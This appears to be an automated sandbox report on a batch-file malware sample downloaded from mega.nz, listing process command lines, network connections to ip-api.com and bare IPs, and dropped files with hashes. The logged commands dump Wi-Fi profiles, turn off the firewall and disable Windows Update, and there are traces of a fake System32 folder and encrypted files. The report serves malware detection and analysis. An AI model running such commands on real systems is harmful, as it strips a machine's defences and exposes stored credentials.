"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6720 /prefetch:1

C:\Windows\SYSTEM32\cmd.exe

"cmd"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\System32\netsh.exe

"C:\Windows\System32\netsh.exe" advfirewall set allprofiles state off

C:\Windows\System32\sc.exe

"C:\Windows\System32\sc.exe" stop wuauserv

C:\Windows\System32\sc.exe

"C:\Windows\System32\sc.exe" config wuauserv start=disabled

Network

Country Destination Domain Proto
US 8.8.8.8:53 mega.nz udp
LU 31.216.144.5:443 mega.nz tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
LU 31.216.144.5:443 mega.nz tcp
LU 89.44.169.132:443 eu.static.mega.co.nz tcp
LU 89.44.169.132:443 eu.static.mega.co.nz tcp
LU 66.203.125.12:443 g.api.mega.co.nz tcp
LU 66.203.125.12:443 g.api.mega.co.nz tcp
N/A 224.0.0.251:5353 udp
LU 89.44.169.132:443 eu.static.mega.co.nz tcp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
CA 185.206.25.16:443 gfs302n506.userstorage.mega.co.nz tcp
CA 185.206.25.16:443 gfs302n506.userstorage.mega.co.nz tcp
CA 185.206.25.16:443 gfs302n506.userstorage.mega.co.nz tcp
CA 185.206.25.16:443 gfs302n506.userstorage.mega.co.nz tcp
CA 185.206.25.16:443 gfs302n506.userstorage.mega.co.nz tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 185.208.158.139:27667 tcp
US 208.95.112.1:80 ip-api.com tcp
US 185.208.158.228:7000 tcp
US 208.95.112.1:80 ip-api.com tcp
US 185.208.158.139:27667 tcp
IT 185.196.8.135:7000 tcp
US 208.95.112.1:80 ip-api.com tcp
US 185.208.158.139:27667 tcp
US 185.208.158.139:27667 tcp
US 185.208.158.139:27667 tcp
US 185.208.158.228:7000 tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0c5042350ee7871ccbfdc856bde96f3f
SHA1 90222f176bc96ec17d1bdad2d31bc994c000900c
SHA256 b8b1cb139d4d19a85adce0152fa3c4f6adfb73a322d7253820e848c6f82afc1b
SHA512 2efdb535fa6a06c4f9702b2129f2dd07c330e37fd10b492f2236007c660c1707773c22005d1e1fa580dbf633dc1a700ada3b7b611ef9accd9555a17a244f61ce

\??\pipe\LOCAL\crashpad_4152_QXQANLSMDCQHUMOR

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 5e027def9b55f3d49cde9fb82beba238
SHA1 64baabd8454c210162cbc3a90d6a2daaf87d856a
SHA256 9816e980b04f1fe7efaa4b9c83ff6a0fdd485ee65a884c001b43a0cad7c39d83
SHA512 a315e1336c5ec70cbb002969e539068ba92f3ec681b6d863db95227fd1808a778fd994e2fb03f28f0e401677aa5f7c66813e315b6b99a5065384c49586f9782e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 bcb981221a676aa609ec29f5fff9c542
SHA1 9c311b3225c378e1d3c4e2f6722960e8f14b7e05
SHA256 c3c96b2a677b920edad4166cfce056f94979d41cdcf5c0396cb496b78b969454
SHA512 1053cea240745cc595c2b745c3e81b4dfb297cd64366bb739ba1147ed234081a8841acb33acc260a04847879e5baaa875ca7894bdba9f3148074cf4c88601a28

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\000\t\Paths\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 8c0851600467abf4d1734b6d4f1b2ab6
SHA1 ceda8f17c6baa4723dddd20ac89e57ec43a116d5
SHA256 fb3c2540b1fcbfa50d9645a524f5a073b5b8d957bd70cc5fec00e9f4ba3707c9
SHA512 6afa96b4a1ec339fd951e82a7f5f798e318a1e7f766102b1de5105c2fa17130e78cdbbfcc2c5e47e930d3133a3d8f5e5b334c0ccf5279007668c3f1be36c6563

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 720b67ecacc169bf7c16e53cc03f0c38
SHA1 c652b0f9cf7602fd71017016bc1bbb86bc369e77
SHA256 d4f9fb950b5b7799c0934ada57c66fbd64944cccdf2dc0cec2ae5cd62865e4bd
SHA512 8897551519bc5a825aecfa807c44b8340db59903e5f84ccc58500129dfc0ce85646425fe2b74cb4fab4950220639b80febdd02ccb623f01fcc8189d56ccacaeb

C:\Users\Admin\Downloads\Unconfirmed 72931.crdownload

MD5 df79a2e9b6b1ea5d0e21a969e47872fb
SHA1 aae0e2095979df8742a216ec22897e165aabacf2
SHA256 422239a5b1185c4cada5fc407105fe57d8f7eccfdc2fef28d44213e0657f8d08
SHA512 d8a7d56f1679e3c1ad25d413674486bf9456fb2df7a622343c75a96b74015902628fcd49a097f61bc4a181faec1018fa6be4cf6d91b336f7eef6f3d11c95159a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 b725ab4692566a8a67a90e7f02b45757
SHA1 c62c455d0b7756870805df71957ded4ede429f98
SHA256 675285ab59590e682e792a704722370ff02ba1723b840407e6bea53ce12a637c
SHA512 b9fdd097a7542a58c8db290ed522c6e670a33acf5b72bda3f8ce98e00f8a25957ae28df689a6f92e8b82d0d68332cf2897a5f06ce0f895185988adc2e8f84c19

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57b844.TMP

MD5 37674e9fe5bf4c6c80e12ef134ec115b
SHA1 74b2baf783d11d042f42339927db3db675dc7818
SHA256 942488bd26bf1478f59b24af423544217eb32901cb766b2ed4013542b922e291
SHA512 a71421b1fe77645aed3122e86397a2eb97c5830ae90d650ffc76ebaab71ce9d1219549f0ee181c3dc6706183b0a2c509dad9c5a24cc8f73901bf4c48c3899c71

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 03ef754492169e70e615a1c9a6f8f693
SHA1 7a046e9c2ced9c58afc758ae2482c26f96bdb08a
SHA256 b52bfeb8e1c3104556d6c765780fd7eeaef373d578489ef9b685ab4d45b8ec87
SHA512 1ea344da769f03c1dbfa2d2544292a4067addbf7a7c8eb2bcd5fcbfba62ac53921cf10b69a6a5f182a1567749c62fd9d944c720c39c338154767119b61cef5d3

C:\Users\Admin\Downloads\KLLauncher.bat:Zone.Identifier

MD5 fbccf14d504b7b2dbcb5a5bda75bd93b
SHA1 d59fc84cdd5217c6cf74785703655f78da6b582b
SHA256 eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
SHA512 aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

memory/3812-215-0x0000012BB47B0000-0x0000012BB47D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lr0r4ei5.vwd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3812-223-0x0000012BB4A10000-0x0000012BB4A56000-memory.dmp

memory/3812-233-0x0000012BB49F0000-0x0000012BB4A00000-memory.dmp

memory/3812-234-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/3812-235-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/3812-236-0x0000012BB5130000-0x0000012BB52B2000-memory.dmp

C:\Windows \System32\ComputerDefaults.exe

MD5 640693107ee411d8e862ab115d7b4639
SHA1 497435f5727c5bfe31331ba245e9b7b95dc69d2a
SHA256 a2794be7cb7a4ad2f526fe91ca95a36b2ec1648b288088eaa4809402c7b2c6f4
SHA512 3a554fe1d8d23f06ac86bb078b3e5b4815722adbacbf9492b5b7ad27bf27d44dd948387268dedc2943afc3557ef234e8882475c813cc5f5f4ab566e52bbb03db

C:\Windows \System32\MLANG.dll

MD5 e286ada1af4b08fa4b7c78f862883c4e
SHA1 798ebc7b7cd3db667f1a59ade299be4cff397f39
SHA256 16eb71b68025711fdbc93229fde22ecc73dc8a23be8b40700772b96978187ea3
SHA512 fbbbc893388a39e94d8b2265aef75dbaf5fd928fadabd3dbfc5cbee64b600de0102b82e5d2b5c56efe128b45f6ddd4bba2668194c05decdfa78c8e7e382de3f5

memory/3780-259-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/3780-258-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/3780-270-0x000002556FBC0000-0x000002556FD04000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 4875ef7bbbd9ec69a21564df9a79ccef
SHA1 f4466477412c77fb6c2e317d5b4fe2bdf48b8d4f
SHA256 8c1ccd78627808d249ddf038f3e6b3eb9b68b63a2805282eec416600c5629549
SHA512 90e74486c2e321dce1c814da1a034973b562382cc356c744dd04ea880744ea461094f43f55d5d50da279ad30c4d348814a30b82471325223cff16298b3fbdefd

C:\Users\Admin\AppData\Local\Temp\Crypt.bat

MD5 2358c107f2e3a850178c60f6afb20be1
SHA1 d6a0849ba677b6fde26d132dd54c0083eacae024
SHA256 8f81bb12d135459f6bf1ab45ec9177ea4b29612af4d3f9a416dc42171e542d65
SHA512 245cc1aee968aa599f17da4e4c28c212126f008757b667b10187f072fec2b49c55fee8bc773dd7349e7b3cda7849e7f5879b0b9405d67eeaefce1d7f6b7fdcb3

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 88dc70c361a22feac57b031dd9c1f02f
SHA1 a9b4732260c2a323750022a73480f229ce25d46d
SHA256 43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59
SHA512 19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

C:\Users\Admin\AppData\Local\Temp\Ready.bat

MD5 668a80a060086cb084f44fe2e7d70948
SHA1 5064298fb8e96230c85e988d1f13aa3ea679eee4
SHA256 cd0fa02854edb8245e74932360e97861a48aa98249409917daed8381d876cc4f
SHA512 54b3d40497c3a908564103982ce0f0a13b175bcfabd4862de21b058bda405e88b09c99161c4d38a3a039055aba14511304148e7196fed34b3ea00c92e8e1f235

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 2be01b08c0543a607976a31921b431be
SHA1 a9a5d0782d6583aada06fc44176c76e1f94b9b97
SHA256 c291b834ed17f0f1fef20d2ad721c4786074037421991fbdaf01930330c8bf1f
SHA512 e740c11501a3fc575c8ef253dffc9552555eb93873f79e30b32003d6eaf37e6e41cf39da011a356b0ca4a41b278706f1e3908ea20be1ded90100f8d8312a33c0

memory/1900-310-0x000001FECA6C0000-0x000001FECA6D0000-memory.dmp

memory/1900-311-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/1900-312-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/1900-313-0x000001FECAD80000-0x000001FECADCE000-memory.dmp

memory/4888-326-0x000001F7FD500000-0x000001F7FD510000-memory.dmp

memory/4888-328-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/4888-327-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/4888-329-0x000001F7FDBA0000-0x000001F7FDC8C000-memory.dmp

memory/4888-332-0x000001F7FDC90000-0x000001F7FDD6A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8b9a260789a22d72263ef3bb119108c
SHA1 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256 d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

memory/4308-353-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/4308-352-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/4308-360-0x0000028CC5E70000-0x0000028CC5E86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Zero.bat

MD5 b193cc73c1120f4e277ad9a1b242d98c
SHA1 6e99a9d4b013f299c27ad6b984a06757cedc1d23
SHA256 48a65a2e51fb4891bff918cf55231b1cc4aee129f945789b2d7f8cd988b66a02
SHA512 3593592c38590786e1187704634203b269692f69e1f0c7af417ace4d076deb74260a8f55b8a100a0cd142e4df20dfed26b5b4f83e3cbb12ecf399cd6b5180cf3

C:\Users\Admin\AppData\Local\Temp\Lion.bat

MD5 54f4209e9822dcbb808ce58ad71bb220
SHA1 bf69591a55b153acfe2f95de88240515dacb12c1
SHA256 3b435337d04e078702eff4d242a4c4a5c7580dfdcae6fd78469b02fa51d75f2b
SHA512 b5df846cec5b2802358e9718f6fa4fb38735c7f12677381cafc8c461bfa93b8685e58e179ef062a600fa8b74acd1e102068a8b921cbb2293ef70d996531d31c9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 71bda94964d6289e6fa631df9ac0f1f7
SHA1 d311bc49013b450958ff644da7b7c911b0eec0f9
SHA256 61f49244f9119a7d97fe21d9e80908ead31194b465753b618c5d6db685e40260
SHA512 7bdadaa466637894e6bab889248212ddebb9821860f32ec40182041584807ba69f82918c8ebfef1afe8e32488edd49307a29cb976cef7a1ebf32e70365cdcf02

memory/3732-389-0x000002496E920000-0x000002496E930000-memory.dmp

memory/3732-390-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/3732-391-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/3732-392-0x000002496F040000-0x000002496F0C4000-memory.dmp

memory/4612-405-0x000002BFE9A30000-0x000002BFE9A40000-memory.dmp

memory/4612-407-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/4612-408-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/4612-409-0x000002BFE9DA0000-0x000002BFE9DEE000-memory.dmp

memory/4612-412-0x000002BFE9A40000-0x000002BFE9A56000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 e566632d8956997225be604d026c9b39
SHA1 94a9aade75fffc63ed71404b630eca41d3ce130e
SHA256 b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0
SHA512 f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd

memory/5392-443-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/5392-444-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/5392-451-0x000001A6F5BE0000-0x000001A6F5C6C000-memory.dmp

memory/5576-468-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/5576-469-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/5576-472-0x0000025854E80000-0x0000025854E96000-memory.dmp

memory/5704-485-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/5704-486-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/1900-487-0x000001FECAF20000-0x000001FECAF36000-memory.dmp

memory/5392-508-0x000001A6F6710000-0x000001A6F681A000-memory.dmp

memory/5392-509-0x000001A6F6620000-0x000001A6F6632000-memory.dmp

memory/5392-510-0x000001A6F6680000-0x000001A6F66BC000-memory.dmp

memory/5392-512-0x000001A6F68A0000-0x000001A6F6916000-memory.dmp

memory/5392-513-0x000001A6F6660000-0x000001A6F667E000-memory.dmp

memory/5392-523-0x000001A6F8D30000-0x000001A6F9258000-memory.dmp

memory/5392-522-0x000001A6F8630000-0x000001A6F87F2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 bf4fbdf5f798a4e95375def4406bc056
SHA1 735994e2b97813a66a042539e9d8cfc1cdc0953b
SHA256 9626921f63d3cc511386aef5bfefaa480cf06315129db1f4da4d9395c73858a1
SHA512 02b82447b4d16d943e2f2607a148d1e58af9fb045e09835cc802d766dacd39b0d1402538ab43335dfa56ce2a6c36c6ad195c5efc8054cf2766824df4c786d708

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

MD5 b8c462edd1a72afbef10f5c8516bb84c
SHA1 6fc9e77ffc9549d630162bf3ffaa4377b8169e50
SHA256 39dba404ec86ff61045b73716add587097bf67bee3b6da724cc4f3a6ee0f111f
SHA512 7b70c7935221881fa04ad4aae29fe2520c0fabb9b0961912b3d5d0693e6ca98dbdc8a2fc0bb08dcef240bec0282bb226ff02c8ce5823dd2a593fef1ebaf09865

C:\Users\Admin\AppData\Local\Temp\tmp27CA.tmp

MD5 14ccc9293153deacbb9a20ee8f6ff1b7
SHA1 46b4d7b004ff4f1f40ad9f107fe7c7e3abc9a9f3
SHA256 3195ce0f7aa2eae2b21c447f264e2bd4e1dc5208353ac72d964a750de9a83511
SHA512 916f2178be05dc329461d2739271972238b22052b5935883da31e6c98d2697bd2435c9f6a2d1fcafb4811a1d867c761055532669aac2ea1a3a78c346cdeba765

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 807728840ff468b46a3b9624461c540d
SHA1 225a1204a77df81608d37a4a0358590ada609ad7
SHA256 3d419ac12c0199eac92f33cf485942b7b2fd4cacd081d8a4bc6c1295ab81e1e8
SHA512 1d1e8d08c473b3470fe9c4c784acb7740d8f29351cbb09d610cc9c669b2315945dd3be07e1fd66af3f7cf9711c28579ecad9cc22bf2901605dbd152615073dfe

C:\Users\Admin\AppData\Local\Temp\tmp282A.tmp

MD5 87210e9e528a4ddb09c6b671937c79c6
SHA1 3c75314714619f5b55e25769e0985d497f0062f2
SHA256 eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1
SHA512 f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0

memory/1860-570-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/1860-569-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/5228-609-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/5228-608-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/1428-618-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/1428-617-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/1428-620-0x000001AACD8A0000-0x000001AACD8B6000-memory.dmp

memory/5176-683-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/5176-684-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/5864-716-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/5864-715-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/5916-766-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/5916-767-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

memory/460-837-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp

memory/460-838-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 008114e1a1a614b35e8a7515da0f3783
SHA1 3c390d38126c7328a8d7e4a72d5848ac9f96549b
SHA256 7301b76033c2970e61bab5eaddaff5aa652c39db5c0ea5632814f989716a1d18
SHA512 a202fc891eace003c346bad7e5d2c73dadf9591d5ce950395ff4b63cc2866b17e02bd3f0ad92749df033a936685851455bcdbfad30f26e765c3c89d3309cb82b

memory/4308-892-0x0000028CC6560000-0x0000028CC656C000-memory.dmp

C:\Users\Admin\NTUSER.DAT{2fa72cf3-34ca-11ed-acae-cbf1edc82a99}.TMContainer00000000000000000001.regtrans-ms.ENC

MD5 c2b914d622e71b24319d75f11166b584
SHA1 746581a2292c8fdafd5665ac01b3f14d76633edd
SHA256 9e15682ed642c1c152fc5a4cab912b213dd546813982d2d70adde11b5202c5ed
SHA512 7658d847b08c5d8ca062a8a69b0ab9589f4fd554225601705f3c6672ea8fd23267e606d0e3999e125282e1179a1f064000fbc4dfa9aeb5129247b7625a6f055d

memory/4308-1107-0x0000028CC6A70000-0x0000028CC6A7C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b5571f0e979dfe4b4988b56c6cda3b0d
SHA1 88595bcd9c4936725a18d0e35b6ea5f059d7773a
SHA256 22ac81f37cf9a7e965b5692b1d772ab4b7d7d0dafadc479bac78dd94bd7cd6d9
SHA512 75d404e73bcf71dafb2b8e33fa032af8f66adddd2dea106bae3abbd5f4ffb3205d35de16e81bf1f70c8d57ba0a67963fb5474169cc9094c7403df58aa2866d3a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 34ba88c0318ca7b09d73f8b27b38711b
SHA1 801b00136cd012a853b49f016b139ad581a4fa87
SHA256 5a01daaa5be0a36b3980d07f8c0c8f319a635df5166978830c70b3d7e1c310bc
SHA512 a70b734de78fd73661def3a95139c25e140527cfd38dda134da6f8facda089ccf6ba48e526bdebf881be92846506f36c7c514353a590490165ba868d346ea8d5

memory/4308-1800-0x0000028CC6A80000-0x0000028CC6DD0000-memory.dmp

memory/4308-1801-0x0000028CC6DD0000-0x0000028CC6DDE000-memory.dmp